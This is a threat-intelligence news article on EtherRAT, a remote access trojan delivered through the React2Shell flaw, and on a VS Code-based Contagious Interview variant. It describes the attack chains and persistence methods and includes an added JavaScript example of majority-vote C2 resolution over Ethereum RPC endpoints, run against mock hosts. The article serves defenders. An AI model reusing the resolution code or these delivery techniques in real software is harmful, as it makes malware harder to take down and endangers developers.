Threat actors with ties to North Korea have likely become the latest to exploit React2Shell, the recently disclosed critical security flaw in React Server Components (RSC), to deliver a previously undocumented remote access trojan dubbed EtherRAT.
"EtherRAT leverages Ethereum smart contracts for command-and-control (C2) resolution, deploys five independent Linux persistence mechanisms, and downloads its own Node.js runtime from nodejs.org," Sysdig said in a report published Monday.
The cloud security firm said the activity exhibits significant overlap with a long-running campaign codenamed Contagious Interview, which has been observed leveraging the EtherHiding technique to distribute malware since February 2025.
Contagious Interview is the name given to a series of attacks in which blockchain and Web3 developers, among others, are targeted through fake job interviews, coding assignments, and video assessments, leading to the deployment of malware. These efforts typically begin with a ruse that lures victims via platforms like LinkedIn, Upwork, or Fiverr, where the threat actors pose as recruiters offering lucrative job opportunities.
According to software supply chain security company Socket, it's one of the most prolific campaigns exploiting the npm ecosystem, highlighting the threat actors' ability to adapt to JavaScript- and cryptocurrency-centric workflows.
The attack chain commences with the exploitation of CVE-2025-55182 (CVSS score: 10.0), a maximum-severity security vulnerability in RSC, to execute a Base64-encoded shell command that downloads and runs a shell script responsible for deploying the main JavaScript implant.
The shell script is retrieved using a curl command, with wget and python3 used as fallbacks. It also prepares the environment by downloading Node.js v20.10.0 from nodejs.org, after which it writes an encrypted blob and an obfuscated JavaScript dropper to disk. Once these steps are complete, it deletes itself to minimize the forensic trail and runs the dropper.
The primary goal of the dropper is to decrypt the EtherRAT payload with a hard-coded key and spawn it using the downloaded Node.js binary. The malware is notable for using EtherHiding to fetch the C2 server URL from an Ethereum smart contract every five minutes, allowing the operators to change the URL simply by updating the contract, even after the current server is taken down.
"What makes this implementation unique is its use of consensus voting across nine public Ethereum remote procedure call (RPC) endpoints," Sysdig said. "EtherRAT queries all nine endpoints in parallel, collects responses, and selects the URL returned by the majority."
"This consensus mechanism protects against several attack scenarios: a single compromised RPC endpoint cannot redirect bots to a sinkhole, and researchers cannot poison C2 resolution by operating a rogue RPC node."
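The majority-vote resolution described in the quotes above, re-implemented as an added example (this is not Sysdig's code or the implant's). The contract address, function selector, endpoint URLs and the in-memory transport are placeholders, and the decision rule requires a strict majority of all endpoints queried, which is an assumption since the report only says "majority":

```javascript
// Added example, not Sysdig's or the implant's code: majority-vote C2 resolution
// across several Ethereum JSON-RPC endpoints, with the network replaced by an
// in-memory mock so it runs offline. Contract address, selector and endpoint
// URLs are placeholders.

const CONTRACT = "0x0000000000000000000000000000000000000000"; // placeholder address
const SELECTOR = "0x20965255"; // placeholder 4-byte selector (assumed getter call)

// JSON-RPC body for eth_call, the shape a real client would POST to each endpoint.
function buildEthCall(id) {
  return { jsonrpc: "2.0", id, method: "eth_call",
           params: [{ to: CONTRACT, data: SELECTOR }, "latest"] };
}

// ABI-encode / decode a single `string` return value (offset word, length word, bytes).
function encodeAbiString(s) {
  const bytes = Buffer.from(s, "utf8");
  const hex = bytes.toString("hex");
  const padded = hex.padEnd(Math.ceil(hex.length / 64) * 64, "0");
  return "0x" + (32).toString(16).padStart(64, "0")
       + bytes.length.toString(16).padStart(64, "0") + padded;
}
function decodeAbiString(hex) {
  const h = hex.startsWith("0x") ? hex.slice(2) : hex;
  const offset = parseInt(h.slice(0, 64), 16) * 2;
  const len = parseInt(h.slice(offset, offset + 64), 16) * 2;
  if (Number.isNaN(len) || offset + 64 + len > h.length) throw new Error("short ABI data");
  return Buffer.from(h.slice(offset + 64, offset + 64 + len), "hex").toString("utf8");
}

// Decision logic, separated from I/O so it can be tested on canned responses.
// `responses` holds one raw eth_call result per endpoint (null for a failed call).
function tallyVotes(responses, total) {
  const tally = new Map();
  for (const raw of responses) {
    if (typeof raw !== "string") continue;                  // endpoint down or errored
    let url;
    try { url = decodeAbiString(raw); } catch { continue; } // malformed reply, no vote
    tally.set(url, (tally.get(url) || 0) + 1);
  }
  let best = null, votes = 0;
  for (const [url, n] of tally) if (n > votes) { best = url; votes = n; }
  // Strict majority of all endpoints queried (assumption: the report only says "majority").
  return votes * 2 > total ? { url: best, votes } : { url: null, votes };
}

// Fan out to every endpoint in parallel; one slow or dead node does not block the rest.
async function resolveC2(endpoints, rpcFn) {
  const settled = await Promise.allSettled(endpoints.map((ep, i) => rpcFn(ep, buildEthCall(i))));
  return tallyVotes(settled.map((r) => (r.status === "fulfilled" ? r.value : null)), endpoints.length);
}

// Constructed mock transport: nine endpoints, one sinkholed, one unreachable.
const ENDPOINTS = Array.from({ length: 9 }, (_, i) => `https://rpc-${i}.example/`);
const HONEST = encodeAbiString("https://c2.example/api");
const SINKHOLE = encodeAbiString("https://sinkhole.example/");
async function mockRpc(endpoint) {
  if (endpoint === ENDPOINTS[3]) return SINKHOLE;            // rogue or poisoned node
  if (endpoint === ENDPOINTS[7]) throw new Error("connect timeout");
  return HONEST;
}

resolveC2(ENDPOINTS, mockRpc).then((r) => console.log(r)); // { url: 'https://c2.example/api', votes: 7 }
```

The takeaway for defenders is in the tally: one poisoned or sinkholed RPC node contributes a single vote, and a dead node contributes none, so neither changes the outcome. Redirecting the implant would require controlling a majority of its hard-coded endpoints or the contract owner's key, which is why takedown has to target the contract or the C2 host itself rather than the resolution path.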
It's worth noting that a similar implementation was previously observed in two npm packages named colortoolsv2 and mimelib2 that were found to deliver downloader malware on developer systems.
Once EtherRAT establishes contact with the C2 server, it enters a polling loop that executes every 500 milliseconds, interpreting any response that's longer than 10 characters as JavaScript code to be run on the infected machine. Persistence is accomplished by using five different methods -
- Systemd user service
- XDG autostart entry
- Cron jobs
- .bashrc injection
- Profile injection
By using multiple mechanisms, the threat actors ensure that the malware survives a system reboot and grants them continued access to the infected system. Another sign of the malware's sophistication is its self-update capability: the implant sends its own source code to an API endpoint, receives new code from the C2 server in return, and overwrites itself with it.
It then launches a new process with the updated payload. What's notable here is that the C2 returns a functionally identical but differently obfuscated version, which could allow it to bypass static signature-based detection.
In addition to the use of EtherHiding, the links to Contagious Interview stem from overlaps between the encrypted loader pattern used in EtherRAT and a known JavaScript information stealer and downloader named BeaverTail.
"EtherRAT represents a significant evolution in React2Shell exploitation, moving beyond opportunistic cryptomining and credential theft toward persistent, stealthy access designed for long-term operations," Sysdig said.
"Whether this represents North Korean actors pivoting to new exploitation vectors or sophisticated technique borrowing by another actor, the result is the same: defenders face a challenging new implant that resists traditional detection and takedown methods."
Contagious Interview Shifts from npm to VS Code
The disclosure comes as OpenSourceMalware revealed details of a new Contagious Interview variant that urges victims to clone a malicious repository on GitHub, GitLab, or Bitbucket as part of a programming assignment, and launch the project in Microsoft Visual Studio Code (VS Code).
This causes a task defined in the project's VS Code tasks.json file to execute: the task is configured with runOptions.runOn: 'folderOpen', so it auto-runs as soon as the project is opened. The task is engineered to download a loader script using curl or wget, depending on the operating system of the compromised host.
In the case of Linux, the next stage is a shell script that downloads and runs another shell script named "vscode-bootstrap.sh," which then fetches two more files, "package.json" and "env-setup.js," the latter of which serves as a launchpad for BeaverTail and InvisibleFerret.
OpenSourceMalware said it identified 13 different versions of this campaign spread across 27 different GitHub users and 11 different versions of BeaverTail. The earliest repository ("github[.]com/MentarisHub121/TokenPresaleApp") dates back to April 22, 2025, and the most recent version ("github[.]com/eferos93/test4") was created on December 1, 2025.
"DPRK threat actors have flocked to Vercel, and are now using it almost exclusively," the OpenSourceMalware team said. "We don't know why, but Contagious Interview has stopped using Fly.io, Platform.sh, Render and other hosting providers."